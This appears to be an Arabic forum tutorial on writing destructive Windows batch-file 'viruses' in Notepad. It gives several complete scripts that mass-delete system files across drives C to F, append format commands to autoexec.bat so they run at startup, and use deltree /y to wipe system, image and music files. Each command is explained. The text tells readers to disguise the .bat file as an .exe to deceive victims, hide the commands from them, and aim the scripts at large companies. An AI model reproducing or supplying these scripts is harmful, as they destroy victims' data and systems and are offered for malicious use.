|
informatique - les virus
|
||||
|
|
language run virs
لغة تشغيل الفيروس : لغة ليس جديدة الإنك ستجد كيف تصنع أسلاحت الدمار الشامل عبر الشبكة العنكبوتية ما هي أسلاح الدمار ! أسلاح الدمار الشامل للكمبيوترات وتخأف منها كبار الشركات وهي برمجة الفيروسات برمجة الفيروسات يعتقد البعض أنها صعبة أنا أقول لهم ليس صعبة اذا تركت اختراق المواقع واختراق الايميلات واختراق اخيك أو صديق لك قريب أو عزيز لكن نحن هن اسندخل في عالم جديد عالم الفيروسات وطرق نشر الفيروسات برمجة الفيـروسات ليس صعبة مثل ما سبق وقلت لك برمجة الفيروسات برمجة سهلة جدا وبسيطة وغير معقدة ويتم برمجتها عبر برامج أو عبر المفكرة وهيnete pad لكن نحن هنا راح نستخدم اnote pad وهي المفكرة أو البعض يقول المستند النصي طبعا سنعمل الفيروسات مستهدفة لشئ معين اذا عملت فيروس غير مستهدف لشئ معين فأءن الفيروس لن يعمل والفيروسات تعمل تحت بيئة الدوس الـms-dos والصراحة شئ رائع أن تعمل فيروس وتطبق الفيروسات على الشركات الكبيرة نبدأ عامة عن الفيروسات الفيروسات نوعان هي : 1- ما يصنع عن طريق برامج / وهي أقوى الفيروسات وأضرارها فادحة ولكن معظمها مكتشف من قبل برامج الانتي فيروس. 2- ما يصنع عن طريق المفكرة notepad / وهي تعتبر أضعف من السابق وأضرارها محدودة على حسب الكود المصنع ولكن معظمها غير مكتشفه من قبل برامج الانتي فيروس. * نقاط هامة : 1- إن أهم شيء في صناعة الفيروس هو كود الفيروس وهذه هي الفكرة كيف تصنع كود فيروس دون الاستعانه بشيء لا برامج ولا تنسخ أي كود 2- الكل يعرف بعد إنشاء كود الفيروس عليك أن تحفظه بإمتداد bat وإذا أردت تغيره إلى exe أو com فيلزمك برامج لتغيرإمتداده وخداع الضحية. 3- اللذي لا يعرف الطريقة لا يجربها على جهازه وأنا بريء من أي دمار يحدث لجهازك . 4- أول ما تنسخ الأكواد اللي في الأسفل في المفكرة وتحفظها بإمتداد bat فأنت قد صنعت فيروس وإحذر من فتحه. 5- سأبدأ الشرح على أكواد فيروسات صنعت بالمفكرة وأحدثت دمار قوي جداً وهي منقولة طبعاً. 6- ملخص عن أوامر الفيروسات (( مهم جداً )) : * (( del ، deltree )) : أمر مسح : وهو أمر مهم ويكاد لا يخلو فيروس إلا وهذا الأمر فيه. * (( *.exe )) : هذا الأمر يقوم بتحديد الملفات التي إمتدادها exe مهما كان إسمها. * (( *.* )) : ويعتبر أقوى أوامر الفيروس على الاطلاق وهو قوي جداً وسيأتي شرحه. * (( @echo off )) : وهذا الأمر يعطى في الفيروس لتنفيذ ما تحت هذا الأمر من أوامر بأسرع صورة ممكنة على شاشة الدوس. * (( cls )) : لمسح الأوامر السابقة التي نفذها الفيروس وبداية تنفيذ أوامر أخرى وهذا يعطى إذا كان الكود طويل ليتم تنفيذ الأمر التالي بصورة سريعة. # وهذا أهم أوامر الفيروس وسنتعرف على أوامر أخرى في الأسفل لا تقول الكود الأول كود PHP: del C:windows *.ini *.exe *.scr *.txt *.log del C:windowssystem32 *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll del C:windowssystem *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll واضح أن من صنع هذا الفيروس هو مبتدئ لاحظ الأوامر اللتي كتبها صاحب الكود وهي كالتالي : أول شيء أعطى الأمر مسح . ثاني شيء حدد مسار الملف اللذي موجودة فيه الملفات المراد مسحها وهو ملف الويندوز C:windows ثالث شيء حدد مسار الملفات المراد مسحها دون تحديد إسمها. اول شي قدمه امر del ( لمسح الملفات ) ثاني شي حدد المكان الموجوده فيه الملفات كود PHP: C:windows C:windowssystem32 C:windowssystem هذه اهي الاماكن الموجوده فيها الملفات ثالث شي قدمه نوع المسارات الي يجب ان تنمسح . * إذاً الفيروس = مسح + تحديد مسار الملف الموجودة فيه الملفات المراد مسحها + تحديد الملفات المراد مسحها . توضيح : (( A.ini )) لو وضع هذا الأمر لقام الفيروس بمسح الملفات اللتي إسمها A وإمتدادها ini مثلاً فيه ملفات إسمها B وإمتدادها ini وهي (( B.ini )) فإن الفيروس لن يمسحها لأن الاسم قد إختلف وكذلك إذا إختلف الإمتداد فلن يمسح الفيروس إلا الاسم والامتداد المحددين له لذا فإن هذا الأمر ضعيف جداً. (( *.ini )) وهذا ما استخدمه صاحب الكود السابق وهو مسح جميع الملفات اللي إمتدادها ini مهما كان إسمها إذاً هذه العلامة (( * )) تعني جميع الملفات الموجودة وهذا الأمر يعتبر متوسط القوة لانه قد حدد المسار. (( *.* )) وهذا الأمر هو الأقوى على الاطلاق لانه أعطى أمر بمسح جميع الملفات الموجودة في الملف المحدد مهما كان إسمها ومهما كان إمتدادها. # إذاً بإمكاننا أن نغير الكود ونجلعه مختصر وأقوى من السابق وإليك التعديل : كود PHP: del C:windows *.* del C:windowssystem32 *.* del C:windowssystem *.* صار الفيروس مختصر وأقوى من السابق ولاحظ أننا مسحنا هذه الأوامر كلها : كود PHP: *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll وإستبدلناها بأمر واحد فقط هو (( *.* )). هناك مشكل في هذا الفيروس : لو كان ملف الويندوز في الـD إذاً الفيروس عديم الفائدة ولا ضرر منه. وبشرح الكود الثاني ستفهم الفيروس2 معلومات الفيروس الهدف :: عمل فورمات للكمبيوترات وليس للكمبيوتر واحد language run virs أولا نفتح مثل ما في الصورة  طبعا أبدا>برامج>برامج ملحقة>المفكرة بعد فتح المفكرة تجد أن المفكرةفارغة لاتحتوي على شئ كود الفيروس وهو عبارة عن فورمات النظام اقتباس: FORMAT WINDOWS FULL يعني بجميع أنواعة كود الـفيروس كود PHP: cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd .. cd WINDOWS Cls del *.exe del *.scr del *.ini del *.txt del *.dll del *.dat del *.sys del *.bmp del *.gif del *.jpg Cls del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log Cls cd system Cls del *.***ifest del taskmgr.exe del *.dll del *.ocx del *.sys del *.ini del *.drf del *.log del *.nls Cls del *.wsc del *.oca del *.msc del *.exe del *.com del *.scr del *.vbs del *.inf del *.acm del *.dat del *.HLP Cls del *.sve del *.tha del *.nls del *.sep del *.TXT del *.reg Cls del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log Cls cd drivers del *.sys del *.sys Cls cd .. cd CatRoot2 del *.log del *.txt del *.chk Cls cd .. cd Com del *.msc del *.exe del *.dll del *.tlb Cls cd .. cd config del *.txt del *.Evt del *.sav cd .. @del *.dll cd .. cd .. cd .. cd .. cd .. cd .. cd WINDOWS cd system32 Cls del *.***ifest del taskmgr.exe del *.dll Cls del *.ocx del *.sys del *.ini del *.drf del *.log del *.nls del *.wsc del *.oca del *.msc Cls del *.exe del *.com del *.scr del *.vbs del *.inf Cls del *.acm del *.dat del *.HLP del *.sve del *.tha Cls del *.nls del *.sep del *.TXT del *.reg Cls del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com *.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log Cls cd drivers del *.sys del *.sys Cls cd .. cd CatRoot2 del *.log del *.txt del *.chk Cls cd .. cd Com del *.msc del *.exe del *.dll del *.tlb Cls cd .. cd config del *.txt del *.Evt del *.sav Cls cd .. @del *.dll @echo off echo Fuck u( >>010<< echo he kille u pc donot trea echo if the virs he did not find the system file echo u fuck he will find hem now @del C:windows*.ini Cls @del C:windows*.exe Cls @del C:windows*.com Cls @del C:windowssystem32*.exe Cls @del C:windowssystem32*.sys Cls @del C:windowssystem32*.log Cls @del C:windowssystem32*.drf Cls @del C:windowssystem32*.scr Cls @del C:windowssystem32*.dll Cls @del C:windowssystem32*.ini Cls @del c:windowssystem*.exe Cls @del c:windowssystem*.sys Cls @del c:windowssystem*.log Cls @del c:windowssystem*.drf Cls @del c:windowssystem*.scr Cls @del c:windowssystem*.dll Cls @echo off echo Fuck u( >>010<< @del d:windows*.ini Cls @del d:windows*.exe Cls @del d:windows*.com Cls @del d:windowssystem32*.exe Cls @del d:windowssystem32*.sys Cls @del d:windowssystem32*.log Cls @del d:windowssystem32*.drf Cls @del d:windowssystem32*.scr Cls @del d:windowssystem32*.dll Cls @del d:windowssystem32*.ini Cls @del d:windowssystem*.exe Cls @del d:windowssystem*.sys Cls @del d:windowssystem*.log Cls @del d:windowssystem*.drf Cls @del d:windowssystem*.scr Cls @del d:windowssystem*.dll Cls @echo off echo Fuck u ( >>010<< @del e:windows*.ini Cls @del e:windows*.exe Cls @del e:windows*.com Cls @del e:windowssystem32*.exe Cls @del e:windowssystem32*.sys Cls @del e:windowssystem32*.log Cls @del e:windowssystem32*.drf Cls @del e:windowssystem32*.scr Cls @del e:windowssystem32*.dll Cls @del e:windowssystem32*.ini Cls @del e:windowssystem*.exe Cls @del e:windowssystem*.sys Cls @del e:windowssystem*.log Cls @del e:windowssystem*.drf Cls @del e:windowssystem*.scr Cls @del e:windowssystem*.dll @echo off echo Fuck u ( >>010<< @del f:windows*.ini Cls @del f:windows*.exe Cls @del f:windows*.com Cls @del f:windowssystem32*.exe Cls @del f:windowssystem32*.sys Cls @del f:windowssystem32*.log Cls @del f:windowssystem32*.drf Cls @del f:windowssystem32*.scr Cls @del f:windowssystem32*.dll Cls @del f:windowssystem*.exe Cls @del f:windowssystem*.sys Cls @del f:windowssystem*.log Cls @del f:windowssystem*.drf Cls @del f:windowssystem*.scr Cls @del f:windowssystem*.dll @pause @echo off echo Fuck u( >>010<< echo [killer virs_v1] By Dos*** [Q8_KOL@HOTMAIL.COM] echo if u found u pc has been fuck in theis virs u shoud now ther echo are one *** he can do that Dos*** if u want virs fucker pc echo like thet Die you mother fuckers echo ha ha ha ha [Q8_KOL@HOTMAIL.COM] @pause :exit لاحظ أول أمر اللذي هو : اقتباس: cd .. وهذا الأمر مهم وهو من جعل من الفيروس الأول فيروس ضعيف وظيفة الأمر هو امر الرجوع للمفات للوراء . أي سيبحث الفيروس عن مسار الملف المحدد له إلى أن يجده بمعنى أنه لو كان الويندوز في : اقتباس: c: او d:او f:او e: سيصيده الفيروس أما لو كان الأمر كما في الفيروس الأول وهو البحث في الـ C فقط فإن الفيروس لن يصيد الويندوز إلا إذا كان الويندوز في الـ C فقط . الأوامر : كود PHP: cd WINDOWS او كود PHP: cd system32 او كود PHP: cd system هذه الملفات المحددة المطلوب من الفيروس الوصول إليها والأمر cd الموجود أمام كل مجلد هو أمر للرجوع للوراء كما وضحنا سابقاً أي أن الفيروس سيبحث أولاً في القرص C إلى أن يجد الملف المحدد له فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص D فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص E فإن لم يجده سيرجع الفيروس تلقائياً وسيبحث عن الملف المحدد له في القرص F سيبحث الفيروس عن الملف إلى أن يصيده وهذا أمر قوي في هذا الفيروس الأمر : اقتباس: Cls وهو أمر لمسح شاشة الدوس وجعلها نظيفة لتهيئتها لأوامر قادمة تم استخدام هذا الامر من اجل جعل الاوامر تنفذ بسرعه ومن دون شعور الضحيه بالاوامر التي مرت عليه الأوامر : كود PHP: del *.ocx del *.sys del *.ini del *.drf del *.log del *.nls del *.wsc del *.oca del *.msc إن كنت تريد ان تعرف كيفيه مسح ملف محدد فما عليك إلا كتابه كود PHP: del file name.exe او dll او اي مسار ويجب ان يكون الملف الذي تريد حذفه محدد المسار عن طريق شاشة الدوس يعني يجب أن نكتب امر المسح اول شي ومن ثما اسم الملف المطلوب مسحه ومن ثم مسار الملف وكما قلنا الأمر *.* هو الأقوى مثلاً : اقتباس: del *.* لأغنانى هذا الأمر عن السابق الأمر : اقتباس: @echo off أمر يستخدم من اجل كتابة اوامر تنفذ على شاشة الدوس بأسرع صورة ممكنه حتى لا يشعر بها الضحية. الأمر : اقتباس: echo اكتب هنا الاوامر او اكتب ما تريد ان يظهر على شاشة الدوس لينفذ بسرعة عالية. تم تحديد مسارات الملفات بذكر اسم المحرك اقتباس: c: // d: // e: // f: // الكود الثالث : كود PHP: call attrib -h -r c:autoexec.bat >nul echo format c: /q /u /autotest >nul >>c:autoexec.bat echo format d: /q /u /autotest >nul >>c:autoexec.bat echo format e: /q /u /autotest >nul >>c:autoexec.bat echo format f: /q /u /autotest >nul >>c:autoexec.bat الشرح كود PHP: echo format c: /q /u /autotest >nul >>c:autoexec.bat الأمر: اقتباس: echo وظيفته : من اجل الكتابه بأسرع ما يمكن. ظهر لدينا أمر جديد وهو هذا الأمر : كود PHP: format c: /q /u / وظيفته : وهذا الأمر من اسمه معروف وهو لعمل فورمات الأمر: الامر من اجل وضعه بملف كود PHP: autotest أيضاً أمر جديد وهو الأمر : كود PHP: nul وظيفته : عملية مضاعفه لامر الفورمات من اجل جعل الامر مرتين بدل مره واحده . اقتباس: c:autoexec.bat المكان الذي سيتم الحفظ فيه بجهاز الضحيه وتم اختيار اسم اقتباس: autoexec من اجل ان يعمل الفايرس من تلقاء نفسه واذا قمت بكتابة كود الفايرس بنوته باد ومن ثم تغير مسار النوته إلى bat وفتح الملف سوف تجد ملفات باسم اقتباس: autoexec موجود في c: لان تم تحديد مكان الحفظ في السي وستكون الاوامر بهذا الشكل كود PHP: format c: /q /u /autotest format c: /q /u /autotest وظهرت الاوامر بهذا الشكل لاننا كتبنا في الكود كود PHP: nul ولهذا السبب تم مضاعفة الامر في الملف الذي عمله الفايرس نسخه في c ومثل ما ترون تم مضاعفة الامر ومثل ما ترون الفيروس عبارة عن سطر والأسطر الباقية نفس السطر ث الكود الرابع : كود PHP: @Echo off c: cd %WinDir%System deltree /y *.dll cd deltree /y *.sys cd deltree /y *.ini cd deltree /y *.exe cd deltree /y *.txt cd deltree /y *.bat الأمر : كود PHP: @Echo off تم شرحه وهو للكتابة بصورة سريعة . الأمر : كود PHP: cd %WinDir%System تم شرحه وهو لتحديد مسار الملف المراد الوصول إليه. الأمر : كود PHP: cd تم شرحه وهو للرجوع للوراء. الأمر : كود PHP: deltree تم شرحه وهو أمر للمسح أو الحذف . الأمر: كود PHP: /y وهذا الأمر جديد وإليك شرحه هذا الأمر يستخدم لتنفيذ الأوامر دون الموافقة عليها. وأنا أعتقد أنه لا يأتي إلا مع الأمر deltree فإذا سويت del /y *.sys فإن الفيروس لن يعمل إذاً لا يعمل إلا مع الأمر deltree هذا من الأوامر : كود PHP: *.dll *.sys *.ini *.exe *.txt *.bat وهي الملفات المراد مسحها أو حذفها. فيروس 4كود PHP: @Echo off e: deltree /y *.jpg cd deltree /y *.mp3 cd deltree /y *.asf |
|
||